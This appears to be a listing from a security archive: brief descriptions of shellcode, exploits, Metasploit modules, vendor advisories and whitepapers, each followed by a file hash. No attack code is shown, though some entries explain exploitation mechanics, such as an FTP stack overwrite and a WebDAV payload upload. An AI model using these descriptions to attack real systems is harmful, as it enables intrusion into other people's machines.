26 bytes small Win32 shellcode that launches cmd.exe. Written for XP SP2 Turkish.
907368c1775ddf7385d0c2734f57d7c482048ce7978fcd5bc65ef6d9c7ab5f0f
26 bytes small Win32 shellcode that launches cmd.exe. Written for XP SP3 English.
397875b7dca92fc5ed4e9e0422258d87916ded2d39a840b62844fbfcfe65f5a7
Microsoft Internet Explorer versions 7 and 8 suffer from an url validation vulnerability.
5691209f6297d7c41dfedc1fd1bc337896dda52d19cb5fb673984e723b44156a
Cisco Security Advisory - Cisco IronPort Encryption Appliance devices contain two vulnerabilities that allow remote, unauthenticated access to any file on the device and one vulnerability that allows remote, unauthenticated users to execute arbitrary code with elevated privileges. There are workarounds available to mitigate these vulnerabilities.
f55041eba86b197e802f1e3fb48e213d4b2d5aaf87e4bb30235478c5e4e0f139
Magic_Block1_2 suffers from a remote file disclosure vulnerability.
24612914e0c86a6feb2ca4d0a71edc207c32deab6232020ee1c533a0a987703b
Developed as part of G-SEC's investigation for the "Secure SSL/TLS configuration Report 2010", they developed this little tool called SSL Audit. SSL Audit scans web servers for SSL support, unlike other tools it is not limited to ciphers supported by SSL engines such as OpenSSL or NSS and can detect all known cipher suites. It also has a fingerprinting mode.
28724527671579a60227726d8f0274db7ecfcf5fa272303bdca45d92ef5cb702
Whitepaper called The (In)Security Of Omegle - What Omegle Users Should Know.
e80131176281cee3105d378e20511889276f7a62b84d727248ed8d1b98a6bf37
ULoki Community Forum version 2.1 suffers from a cross site scripting vulnerability.
a2190948885934c0c63581a1eb71dd1ce98a50ac4b3dd1ed99902c05081c997d
HP Security Bulletin - Potential security vulnerabilities have been identified with the Java Runtime Environment (JRE) and Java Developer Kit (JDK) delivered with HP OpenView Network Node Manager (OV NNM). These vulnerabilities may allow remote unauthorized access, privilege escalation, execution of arbitrary code, and creation of a Denial of Service (DoS) .
d609c2737ba3ee1e6d4dc412f6776d14c47fbc01f340bfebad40833c6310c6fa
Serverchk.py is a python script written to scan web applications for SQL injection vulnerabilities.
d0ddb6281fd5a4886511316dd456027446ae9f16291895b5c960f2844b37c776
Ubuntu Security Notice 898-1 - It was discovered that gnome-screensaver did not correctly handle monitor hotplugging. An attacker with physical access could cause gnome-screensaver to crash and gain access to the locked session.
ab9efb0c857c5d767a9f9fa4206aaf3b5e719739cb6d5792bfe3d17825fce697
HASHE! suffers from multiple remote SQL injection vulnerabilities.
f1aa99a84e638330cd790af752f8bb2905762e2eca9d56c8da13c526d34c33e1
HP Security Bulletin - A potential security vulnerability has been identified with HP Network Node Manager (NNM). The vulnerability could be exploited remotely to execute arbitrary commands.
2ff695113e010d874733ddd8a0a1bd5e9e0469ca39922dd749407a99da1b6d38
eSmile suffers from a remote SQL injection vulnerability.
3d3deb0e4f3512d9deed7609fa028c1675df6945080fcbc8562832700a21a0ff
A vulnerability exists in the Microsoft SMB client which allows an attacker to trigger a kernel pool memory corruption by sending a specific 'Negotiate Protocol' response.
dd4096a3adf7c94d29852abe073cbc999aa234b0784a145cc1d0c9ce5a2c7733
PLS PLA WMDownloader proof of concept local buffer overflow exploit that creates a malicious .pls file.
3e61f7070ee3b03509cd8237fdb7e8db6e1bfcf8c051ab0e276e348f4fb82a24
Ubuntu Security Notice 897-1 - It was discovered that MySQL could be made to overwrite existing table files in the data directory. It was discovered that MySQL contained a cross-site scripting vulnerability in the command-line client when the --html option is enabled. It was discovered that MySQL could be made to overwrite existing table files in the data directory. It was discovered that MySQL contained multiple format string flaws when logging database creation and deletion. It was discovered that MySQL incorrectly handled errors when performing certain SELECT statements, and did not preserve correct flags when performing statements that use the GeomFromWKB function. It was discovered that MySQL incorrectly checked symlinks when using the DATA DIRECTORY and INDEX DIRECTORY options. It was discovered that MySQL contained a buffer overflow when parsing ssl certificates.
f0edf6f7535b1520aeb975de468f02533ed513b5b5870eefc4dccd6cc1160507
Whitepaper called Right To Left Override Unicode Can Be Used In Multiple Spoofing Cases. Written in French.
f1b0137bda26ef70c47fb6d33261363a586b255af0a7217e22295d19a8bd8fcf
feedDemon version 3.1.0.9 .opml file local buffer overflow exploit.
bdb43462e833a38c658cf6f4ea913c59a3fd9b5d0c379adb4507e5a5ea47926b
This is a proof of concept exploit for GNOME's Nautilus file manager version 2.26.2.
bd470c247479213d341811294a08a0b0b6b129cd7ca2222f28c9ddd87f5bedf6
This Metasploit module exploits an out-of-bounds array access in the Arcane Software Vermillion FTP server. By sending an specially crafted FTP PORT command, an attacker can corrupt stack memory and execute arbitrary code. This particular issue is caused by processing data bound by attacker controlled input while writing into a 4 byte stack buffer. Unfortunately, the writing that occurs is not a simple byte copy. Processing is done using a source ptr (p) and a destination pointer (q). The vulnerable function walks the input string and continues while the source byte is non-null. If a comma is encountered, the function increments the the destination pointer. If an ascii digit [0-9] is encountered, the following occurs: *q = (*q * 10) + (*p - '0'); All other input characters are ignored in this loop. As a consequence, an attacker must craft input such that modifications to the current values on the stack result in usable values. In this exploit, the low two bytes of the return address are adjusted to point at the location of a 'call edi' instruction within the binary. This was chosen since 'edi' points at the source buffer when the function returns. NOTE: This server can be installed as a service using "vftpd.exe install". If so, the service does not restart automatically, giving an attacker only one attempt.
6c3e569f4a96d6f26bcfe8754e396fc55a9c9d42d38c9300f94855b2dbd501fb
This Metasploit module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script using a WebDAV PUT request.
4ec5b093ab1cb3f7824fc0789935b123c05d0f352410b2d130c1546774dfb524
This Metasploit module exploits a buffer overflow vulnerability in opcode 21 handled by rpc.cmsd on AIX. By making a request with a long string passed to the first argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This leads to arbitrary code execution.
aff1d1ff1b53822a5be662ef7f7cb50a2f60bbc8bab207ec0fc7df83f3270216
SpiderLabs has documented view state tampering vulnerabilities in three products from separate vendors. Microsoft ASP.Net version 3.5, Apache MyFaces versions 1.2.8 and 1.2.7, and Sun Microsystems Mojarra versions 1.2_14 and 2.0.2 are all vulnerable.
274d820d5053b91c5b4019151e6accd446cb31435dfa6ae866e1d89dceee5e44
AdultBannerExchange suffers from an insecure cookie handling vulnerability.
f142410fb170312ad51fa6d4e8e15f8d68406e6dbfa80252e56b9626b1bb942a